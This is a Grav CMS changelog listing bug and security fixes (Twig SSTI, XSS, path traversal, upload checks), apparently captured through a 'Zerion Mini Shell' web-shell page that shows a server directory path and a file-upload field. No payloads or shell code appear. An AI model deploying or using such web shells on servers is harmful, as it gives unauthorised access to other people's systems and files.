ok

Mini Shell

Direktori : /proc/thread-self/root/var/softaculous/grav/
Upload File :
Current File : //proc/thread-self/root/var/softaculous/grav/changelog.txt

# v1.7.46
## 05/15/2024

1. [](#improved) 
   * Better handling of external protocols in `Utils::url()` such as `mailto:`, `tel:`, etc.
   * Handle `GRAV_ROOT` or `GRAV_WEBROOT` when `/` [#3667](https://github.com/getgrav/grav/pull/3667)
1. [](#bugfix)
   * Fixes for multi-lang taxonomy when reinitializing the languages (e.g. LangSwitcher plugin) 
   * Ensure the full filepath is checked for invalid filename in `MediaUploadTrait::checkFileMetadata()`
   * Fixed a bug in the `on_events` REGEX pattern of `Security::detectXss()` as it was not matching correctly.
   * Fixed an issue where `read_file()` Twig function could be used nefariously in content [#GHSA-f8v5-jmfh-pr69](https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69)

# v1.7.45
## 03/18/2024

1. [](#news)
   * Added new Image trait for `decoding` attribute [#3796](https://github.com/getgrav/grav/pull/3796)
1. [](#bugfix)
   * Fixed some multibyte issues in Inflector class [#732](https://github.com/getgrav/grav/issues/732)
   * Fallback to page modified date if Page date provided is invalid and can't be parsed [getgrav/grav-plugin-admin#2394](https://github.com/getgrav/grav-plugin-admin/issues/2394)
   * Fixed a path traversal vulnerability with file uploads [#GHSA-m7hx-hw6h-mqmc](https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc)
   * Fixed a security issue with insecure Twig functions be processed [#GHSA-2m7x-c7px-hp58](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) [#GHSA-r6vw-8v8r-pmp4](https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4) [#GHSA-qfv4-q44r-g7rv](https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv) [#GHSA-c9gp-64c4-2rrh](https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh)
1. [](#improved) 
   * Updated composer packages
   * Updated `bin/composer.phar` to latest `2.7.2`

# v1.7.44
## 01/05/2024

1. [](#new)
   * Added PHP `8.3` to tests [#3782](https://github.com/getgrav/grav/pull/3782)
   * Added debugger messages when Page routes conflict
   * Added `ISO 8601` date format [#3721](https://github.com/getgrav/grav/pull/37210)
   * Added support for `.vcf` (vCard) in media configuration [#3772](https://github.com/getgrav/grav/pull/3772)
1. [](#improved) 
   * Update jQuery to `v3.6.4` [#3713](https://github.com/getgrav/grav/pull/3713)
   * Updated vendor libraries including Dom-Sanitizer `v1.0.7` that addresses an XSS issue 
   * Updated `bin/composer.phar` to latest `2.6.6`
   * Updated vendor libraries to latest
   * Updated language files
   * Updated copyright year
1. [](#bugfix)
   * Fixed a math rounding issue with number validation when using floating point steps [#3761](https://github.com/getgrav/grav/issues/3761)
   * Fixed an issue with `Inflector::ordinalize()` not working as expected [#3759](https://github.com/getgrav/grav/pull/3759)
   * Fixed various issues with file extension checking with dangerous extensions [#3756(https://github.com/getgrav/grav/pull/3756)]
   * Fix for invalid input to foreach in `UserGroupObject` [#3724](https://github.com/getgrav/grav/pull/3724)
   * Fixed exception: `Property 'jsmodule_pipeline_include_externals' does not exist in object` [#3661](https://github.com/getgrav/grav/pull/3661)
   * Fixed `too few arguments exception` in FlexObjects [#3658](https://github.com/getgrav/grav/pull/3658)

# v1.7.43
## 10/02/2023

1. [](#new)
   * Add the ability to programatically set a page's `modified` timestamp via a `modified:` frontmatter entry
2. [](#improved)
   * Update vendor libraries
   * Include `phar` in the list of `security.uploads_dangerous_extensions`
   * When enabled `system.languages.debug` now dumps **Key -> Value** to debugger [#3752](https://github.com/getgrav/grav/issues/3752)
   * Updated built-in composer to latest `2.6.4` [#3748](https://github.com/getgrav/grav/issues/3748)
   * Added support for `@import` to ensure paths are rewritten correctly in CSS pipeline [#3750](https://github.com/getgrav/grav/pull/3750)

# v1.7.42.3
## 07/18/2023

2. [](#improved)
   * Fixed a typo in `Utils::isDangerousFunction`

# v1.7.42.2
## 07/18/2023

2. [](#improved)
   * In `Utils::isDangerousFunction`, handle double `\\` in `|map` twig filter to mitigate SSTI attack
   * Better handle empty email in `Validatoin::typeEmail()`

# v1.7.42.1
## 06/15/2023

2. [](#improved)
   * Quick fix for `isDangerousFunction` when `$name` was a closure [#3727](https://github.com/getgrav/grav/issues/3727)

# v1.7.42
## 06/14/2023

1. [](#new)
   * Added a new `system.languages.debug` option that adds a `<span class="translate-debug"></span>` around strings translated with `|t`. This can be styled by the theme as needed.
1. [](#improved)
   * More robust SSTI handling in `filter`, `map`, and `reduce` Twig filters and functions
   * Various SSTI improvements `Utils::isDangerousFunction()`
1. [](#bugfix)
   * Fixed Twig `|map()` allowing code execution
   * Fixed Twig `|reduce()` allowing code execution

# v1.7.41.2
## 02/06/2023

1. [](#improved)
	*Added the ability to set a configurable 'key' for the Twig Cache Tag: {% cache 'my-key' 600 %}
	
1. [](#bugfix)
    * Fixed an issue with special characters in slug's would cause redirect loops

# v1.7.41.1
## 05/10/2023

1. [](#bugfix)
   * Fixed certain UTF-8 characters breaking `Truncator` class [#3716](https://github.com/getgrav/grav/issues/3716)
   
# v1.7.41
## 05/09/2023

1. [](#improved)
   * Removed `FILTER_SANITIZE_STRING` input filter in favor of `htmlspecialchars(strip_tags())` for PHP 8.2+
   * Added `GRAV_SANITIZE_STRING` constant to replace `FILTER_SANITIZE_STRING` for PHP 8.2+
   * Support non-deprecated style dynamic properties in `Parsedown` class via `ParseDownGravTrait` for PHP 8.2+
   * Modified `Truncator` to not use deprecated `mb_convert_encoding()` for PHP 8.2+
   * Fixed passing null into `mb_strpos()` deprecated for PHP 8.2+
   * Updated internal `TwigDeferredExtension` to be PHP 8.2+ compatible
   * Upgraded `getgrav/image` fork to take advantage of various PHP 8.2+ fixes
   * Use `UserGroupObject::groupNames` method in blueprints for PHP 8.2+
   * Comment out `files-upload` deprecated message as this is not going to be removed
   * Added various public `Twig` class variables used by admin to address deprecated messages for PHP 8.2+
   * Added `parse_url` to list of PHP functions supported in Twig Extension
   * Added support for dynamic functions in `Parsedown` to stop deprecation messages in PHP 8.2+
 
# v1.7.40
## 03/22/2023

1. [](#new)
    * Added a new `timestamp: true|false` option for individual assets
1. [](#improved)
    * Removed outdated `xcache` setting [#3615](https://github.com/getgrav/grav/pull/3615)
    * Updated `robots.txt` [#3625](https://github.com/getgrav/grav/pull/3625)
1. [](#bugfix)
    * Fixed `force_ssl` redirect in case of undefined hostname [#3702](https://github.com/getgrav/grav/pull/3702)
    * Fixed an issue with duplicate identical page paths
    * Fixed `BlueprintSchema:flattenData` to properly handle ignored fields
    * Fixed LogViewer regex greediness [#3684](https://github.com/getgrav/grav/pull/3684)
    * Fixed `whoami` command [#3695](https://github.com/getgrav/grav/pull/3695)
	
# v1.7.39.4
## 02/22/2023

1. [](#bugfix)
    * Reverted a reorganization of `account.yaml` that caused username to be disabled [admin#2344](https://github.com/getgrav/grav-plugin-admin/issues/2344)

# v1.7.39.3
## 02/21/2023

1. [](#bugfix)
    * Fix for overzealous modular page template rendering fix in 1.7.39 causing Feed plugin to break [#3689](https://github.com/getgrav/grav/issues/3689)

# v1.7.39.2
## 02/20/2023

1. [](#bugfix)
    * Fix for invalid session breaking Flex Accounts (when switching from Regular to Flex)

# v1.7.39.1
## 02/20/2023

1. [](#bugfix)
    * Fix for broken image CSS with the latest version of DebugBar

Zerion Mini Shell 1.0